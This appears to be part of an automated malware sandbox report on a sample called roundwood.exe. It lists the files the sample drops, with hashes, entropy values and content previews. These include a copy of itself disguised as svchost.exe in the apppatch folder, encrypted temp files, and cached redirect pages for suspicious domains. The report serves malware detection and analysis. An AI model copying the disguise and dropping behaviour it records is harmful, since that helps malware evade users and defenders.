Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC15.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6841340281438453
Encrypted:	false
SSDEEP:	96:TiZYW+bSgC2Y/YTWNHSJYEZbXtFia3/XxA5wLmmaR5eMkfOI/j3:2ZDyYy5AgBaR5eMkfZ/j3
MD5:	FC45B762E4F7BE3BBA5DA875E24FC69C
SHA1:	FAD3D259FC6592C9FF02FC91B200292918888E56
SHA-256:	8DC1A8DBE3527158CE64881EE59B8B8FD823B9DA5DE9D372E46A4234BFABC573
SHA-512:	D6184C9CF4DFD13CA40BCAB72A7D8AE3F36B1D8DA22E4309DE628F6C93082D6D4FE49890A9A2C1400F2E90A306C1D1D7D7029B41C1D22C76E42AECBF6D7AEA8F
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\PSSYIN6Y.htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with very long lines (487), with CRLF line terminators
Category:	dropped
Size (bytes):	2166
Entropy (8bit):	6.1301215852229545
Encrypted:	false
SSDEEP:	48:+0sJprc4VxD5J6XkiocXlASnxsX0sJprc4VxDVy0sJprc4VxDb:+00JT73iPVAexO00JTU00JTb
MD5:	25F1E06AB7E6609CB7ED1AA8F6581BA4
SHA1:	B70C7CC700EEC16742DDC6009BFCA04D14358499
SHA-256:	83A939DD49DAFD26769E2C2C99C959FAFA6275AAAF4BAB24604695A4388B616C
SHA-512:	72DDE4135DC7A5814B8EA9E2AB532630B67D1F533133380E62DED3E3FDEAE695AE737F6FAB7C0655D00210D7734EEC050B69DC1A0ED336CC691F2012BAC4A46A
Malicious:	false
Preview:	...top.location="http://ww1.lysyfyj.com/?fp=ZbSrv2i18YnNfPNSqSsC6n0jQLvcDPBy65hKrYcVeZdyOk55NkMmURDujLfYrzEMz5BE5QmQNeiQHadmY0w%2B%2BVfpeulpAVXGQKGLT8A7T7dz2YpMc1JfB3BKmsZuIwvejkVQz9GfFhNYAH0cBFF4KID2C7M8REwxyw2jkbe82wtG9h%2FDQyY95q0uURPrzixhzz9eDBBFZ1ErP0Afi2kOK211rGBVLt0uyEAcUFRwmVT4RRdPv%2F665t09U%2FP9JtApZkkSZ1jnwUZFPfrf5um%2B7w%3D%3D&prvtof=85P%2BvzUaO2GB7ULKjb0pRQ9vWyzI7FnHeQjbVBiQzKs%3D&poru=lL%2FTHaDL0%2BASDNkLUsN%2FTJNHeOzJzHu9wApqlIl41Tk%3D&cifr=1&";.../*..-->..<html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QxSmw6RcvjLET9dXUu4diAwDxJRMRhwu5JrKgGGNNluOe+8v6fp9Vrb8zF67AKMkxTjy4Ml2VYDQeupqs/Ba9Q=="><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">...... <meta name="viewport" content="width=device-width"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><script type='text/javascript'>try{document.cookie = 'isframesetenabled=1; path=/;';}ca

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with very long lines (54064), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	105040
Entropy (8bit):	5.796103443327176
Encrypted:	false
SSDEEP:	1536:C8Cg338X8dpsclE2MClQy+m+/XxIMlFFpb8rb8Zb8Kb8Fb8rsZPtYbcr:Czg388psclEYPFWxIWQiP+d/Ybcr
MD5:	66521C5E942C614B84F928DB26E4615E
SHA1:	0471749388435C72BBA635D5AC0209CCE487DBEE
SHA-256:	C6A166F031FCAB851AA3EA96F74F99220C70A0802AB3EE82E386523E46569F8C
SHA-512:	D49ADF3BD6B3DF1A2A777E7A4DE9626984F1B35203A514DF76D8545E647453D4CEDC9A7CC0B9BA4171F08FD97BCD8AD1FC54B2CC3487ACDA976D956EBB49C1EA
Malicious:	false
Preview:	<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\login[3].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\login[1].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with very long lines (481), with no line terminators
Category:	dropped
Size (bytes):	481
Entropy (8bit):	5.806635002584225
Encrypted:	false
SSDEEP:	12:kxvsCk9cE3MxlVT/XZM63uJbYlMSgxw/JQBkCj3IQNlYI:kbxxlVT/jeYlI5eCj4Q8I
MD5:	B607F55EB2D3337DB1E81167934A52B3
SHA1:	9DFBFD73F4255C6B6A16174F6FE3E854AB3146AB
SHA-256:	186EBE9AAAC8BAA982147B6560EAD3A4CC78C5F7916F8CFD065D04C22B4BF688
SHA-512:	12758E3BDB9A08028C6A87E40A090B848DECC44DF822ED988E546548F5840B52E724A3A8B864B22B2063B32690E4326B31DF663FA7F3F33C33C68AF927FAC237
Malicious:	false
Preview:	<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODYxNSwiaWF0IjoxNzI0NDMxNDE1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aWYyZGhkZ2Vja2JhaDAwYWllcWIiLCJuYmYiOjE3MjQ0MzE0MTUsInRzIjoxNzI0NDMxNDE1MDQ5MzMyfQ.q8fyeqWKtqXvR-jaXmTefGHIiCV3QgvJddvdNB6D9oo&sid=a5fae49c-616e-11ef-add0-e1f04491a098');</script></body></html>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\login[1].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.43096450882803
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
MD5:	7A5DF79FBAAFF2C161C6E29461785403
SHA1:	89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
SHA-256:	B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
SHA-512:	19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\login[1].php

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.0957952550009344
Encrypted:	false
SSDEEP:	3:0MXAG3n:0MQa
MD5:	32682312D17C7CBF18E73594F5570319
SHA1:	60E22121BDD0BC71CDB2BAE2A3AA577006B2EAE9
SHA-256:	E55FB1A1D731153E943B68844AF12DCCE8BFAC917C98FFDEA64C80DA0607DD47
SHA-512:	68337DEBB9CD659CECE621AF582AE2BC4B56B9CF06B26C45F4D9EB8BEB91D3F36BEAD287218B5AA2BB4853A1CF1A12017CA57318D7E12F489884FDC6B261DFC1
Malicious:	false
Preview:	Redirecting

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\login[2].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\login[3].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.470551863591405
Encrypted:	false
SSDEEP:	12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
MD5:	3B03D93D3487806337B5C6443CE7A62D
SHA1:	93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
SHA-256:	7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
SHA-512:	770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
Malicious:	false
Preview:	<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\login[4].htm

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	168
Entropy (8bit):	4.429043075947321
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvy:q43tISl6kXiMIWSU6XlI5LP8IpfGpa
MD5:	D57E3A550060F85D44A175139EA23021
SHA1:	2C5CB3428A322C9709A34D04DD86FE7628F8F0A6
SHA-256:	43EDF068D34276E8ADE4113D4D7207DE19FC98A2AE1C07298E593EDAE2A8774C
SHA-512:	0364FE6A010FCE7A3F4A6344C84468C64B20FD131F3160FC649DB78F1075BA52D8A1C4496E50DBE27C357E01EE52E94CDCDA8F7927CBA28D5F2F45B9DA690063
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....

C:\Users\user\AppData\Local\Temp\1540.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	593
Entropy (8bit):	7.626935561277827
Encrypted:	false
SSDEEP:	12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
MD5:	926512864979BC27CF187F1DE3F57AFF
SHA1:	ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
SHA-256:	B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
SHA-512:	F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
Malicious:	false
Preview:	....tp.-$\|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..\|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n\|..h_s.n....r..I..U.T..%N$.B..jj.\.....Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj....H.H...?G..O..tE..9..%.<+<......_.w..S....

C:\Users\user\AppData\Local\Temp\162D.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	25019
Entropy (8bit):	7.9819419763589226
Encrypted:	false
SSDEEP:	384:FARva/n308nlnFMirDjlH/6QiOyNGQMzCgMDEYzmWLtTBsI6WsXI0o3C+0A:F4ak8nl3r9HtbzCl7/s/Ho3CVA
MD5:	79D445942E5CE4064097C7F3D26FB8BD
SHA1:	82EA783DCE1BC1B5E9EF09099DE6207E30913C6F
SHA-256:	F94A8E68DA1D4F509EAAE885555402063E6195D3C806526DF2C6CB10373A2FA5
SHA-512:	A691F67576CDCC60AE7EC17E7FC515301087526687EEE06B7A4BD7AC91E7B026FDEE07B85CCE5636392B5563E0958551708F5F39A0065C83EB86F236EAA32F51
Malicious:	false
Preview:	...[..A.9l.....\|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g............@.......E.:.C0.4..T...L.....3p,.>th..'..V)..a.oZ.,?.,....W..[.Owd..uu..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J...\|..d\|..\|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

C:\Users\user\AppData\Local\Temp\4184.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	24649
Entropy (8bit):	7.979942554649015
Encrypted:	false
SSDEEP:	384:P0YZ3Jjaxk9sU4B5xLlrzEoqL0jK5pkK4NNDRXY0F/6sstkMA3geAaD47owr:dZ3VGB5h6AkeNtoqpbQeR47owr
MD5:	EB5B63E9D89E2B9AF0C62EB0613A3909
SHA1:	143DA0CB6471D1CCC5E4E2C0F8E29EBA2B0BB893
SHA-256:	A1415B441F0C68861DC167481CD975CAA94729C4EA8694D7D5B9B2361A0A0E59
SHA-512:	0E12DDB498F8FE095A52E19DF83B66BC2E380B1B171AE1B15D1D2DCE7BBA74C5ABD3AC705C331DD32A47DB4682804734F1AA9F37EE63CDF2FC6F11B62F9BB02D
Malicious:	false
Preview:	...[..A.9l.....\|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.Z.".....O.m..-..&.u....v.....m...^.c..L.i..pZ..L#..E2..E..r..1.+..}.p.3...iH5.&f..`r..Y.p..c....p.D.l.n .)..%..l...p.....s......h...e....g.5..I.....<#.;/..5Z..r.@....t..`dU:....G+U..Y..,..\X.R......... T.!.J..s..,.%.-.....h..U..OT...f.h._..zf..^.".1.D.)"<..]Z.9..`..f4P..C\...@..n.'...li?=...I....{G...j.R.L5.JK=....S..6.BJ_Y_.((.IFb....,.>..w...........$"..~...5..gk..~.07u.....7O...&.IlU.O..b.@.%.(9....j...d.%.7c.#{K,.......6.V..Q0.....Ot.r.'.f.p.[.A.<..l@.".).....4.......].J.H.tN'..M.&..n.k.;.S.b.7...........J..f(....b.<....>.....NdIWm....{...(;$H....<.............l..+~..o.Nk.N...O...E..F.'%..s.#...\..{S...DE7*aX...~o.......#...f....c.K..B.M.b;..Jom.........Z..t.Y....l....n.O.pn...&..$&.........<.........0.,.M.3.........SCb..&\.L..Y.C.vD.(./...$u.V.=......U".~..

C:\Users\user\AppData\Local\Temp\42D4.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	2166
Entropy (8bit):	7.90492504650355
Encrypted:	false
SSDEEP:	48:TMotAhASVTpDE0Gcu8I3Ij2ZuKO7pz2gQ/X/fnFXsP:TMotATVVDwZIjRT7pz2Jv/fM
MD5:	129DE96086396A38BABD6C41B5563B52
SHA1:	574DC2893D3875CF875ACC9C1984B652FB91FA12
SHA-256:	DE09C84BD7952AE9CBEC559EC616629E577B2502CA275F6B451C35BF92BF9E30
SHA-512:	0AA0C9C6D994DBB31285F2F22CA75A785CA6DACBCE2E9DED5368E4E7E7D6466CB82FCC612D5F052E7E76974E1490B5B24FF3CEF18111C6E16B1A02D48D30A545
Malicious:	false
Preview:	.....D.e#i.....}.f.:s.;..<X....1.=.]..-.....4...>...y.L...[TX,....U...~.....Kg .-.xRt..V!..]..O.R..Fna....H..6z3..H'..f.T....?Y.=..n..W,;.+..a...]-P..\..k..T..16.....mq...$.......=.D..4....y.8.....,..\|...8.\..%S]..(j..}0..UJ..'.~Y.......u.U..w...T".Ru.......O...$c^N..P.b.J.!..{e.cz.=...#..K..'..W.Iv..............^......{.l...&...xM.I.[...8..8"//....NBt'.Zo..+C.-.A.......H...=`..HM^3hw.I=B?.k.....L..?.uq7..P.J.P~.....i........>(J..^.......n>C...C...u.......hu-..Y_...uM...f.M.[\|.%j+...6..~.R$ggo.J.;.fa.......'.=..z..>.0......b/..z...w .mw..x.o5/..p..e...Ns..>....A...J...r.._V..n}.8>qW....r..+.h..K(P...{A.(._.\|.r.t.%.. v$P:....b.1.....B.K.....)..X.i.....{....m8R.+..F.....r[..`.....Ov.]..!..:....yKfg....AB..;g.....q..........Z..V?..6...0..MD.ht.jA\..A..E.f<.Rp.!......:K....H3&aC.W.\|v....\..i...g..._7..F............Ex...........\|Mz...@..../...\-..Z{.. y.........r.........n.z.R.3.......XX7..rI.A....T.o..$./..."e...7.......n.w..

C:\Users\user\AppData\Local\Temp\4314.tmp

Download File

Process:	C:\Windows\apppatch\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	105040
Entropy (8bit):	7.98729667361643
Encrypted:	false
SSDEEP:	1536:AD33bcLXR893yscgbO4BBR7XU9QvHaOBZUEUvl0I7+VF7p3BweU6TVnqqzvwes0h:Vhs3yDh4RkyvHaO3SvsTB7Bns6OU
MD5:	36A031CD25368C1BCDBFE6A35887B006
SHA1:	DAE9FB71865402943B28841E7F1E5CDC8CA86863
SHA-256:	42319D3BBF758A8E024301C2F067C44AF10450B97C5D2741AC1DAA43461663D6
SHA-512:	2ED9EF2985A3711BFE94FAB4DA5188106B28E7F482033D5E5D248F16B34DDEF3E1592CBC3113418C2AF48E35D0CE209987DB9FF1D0BAFBA53548A520E4E68488
Malicious:	false
Preview:	...[..A.9l....A.D.[;.b..DD...}..n.o.zL......._O....r.:...%m8s...o..e....;+.q.o`3...%"..P.(}h1.H.;....%...$).\|...Y.V...:..B..X..Tsa...-.P+..?........8...R..w.q.....qV.O.+.......d.....7.Z.N..V-........i.Y..s.G./pe^......M..7..+..NI.\..l.1.d...`U..zc...7 ....!.7d.Z....Q.y.)u.o..'].v...;.....m......ah...?.......1W.Q....+<..<..\|^..fT.G....t..91......~V..Oq.).. ..W...3...C...iE. ^...f&..+.#.'....w.._...I...k.k.L[.:.....f.+.Y.'9wE..5.(...$.&p...V>E...s.'...m;jpJ..R....:J...f.O..c.YJ8....L...4.X.....k#.dEw..... .j}..f..A..........IU...=..5;.c.wx}@..k..R..i.L%L....e.}.#.l1...{..x.q..9s.f'b\;...X....b.X..A:.....y.w.&.+.{.j....n.JlP&$.7.....0........B.U.r.!@.G.,.:.c.>..IOx.:..^....".v..g;...-.u...."..$....+..k......aT..`op...................l..+)..y.Z`.........E...M..'w..%.9...G..7R...R.7:uG...\|d....X..h...e...A".....O.). v....$Q....5.....;..lU...L.....l.M.M8..4G.SkK.........q..3O...6..]..j.........y..59uC.Y'... :.c.h..b"1q. .....bk.(..

C:\Windows\apppatch\svchost.exe

Download File

Process:	C:\Users\user\Desktop\roundwood.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	223888
Entropy (8bit):	7.808334954025045
Encrypted:	false
SSDEEP:	3072:avm4SZsQrNzPrl6rjGMjp39d4u8iqddCxMIJOb2o5DsBPjim6hwM2H6:s1SyAJp6rjn1gOObn4b6h9h
MD5:	B3CAC91D21D93F1989191CE7572B7F7E
SHA1:	F568318F1BFBA4A7F7BE8DD978C1FFB5D39C9FD4
SHA-256:	5400CB5CE67F83E9B20545B1FDB565F6D5AA468E35423CE044F21166A8364A6D
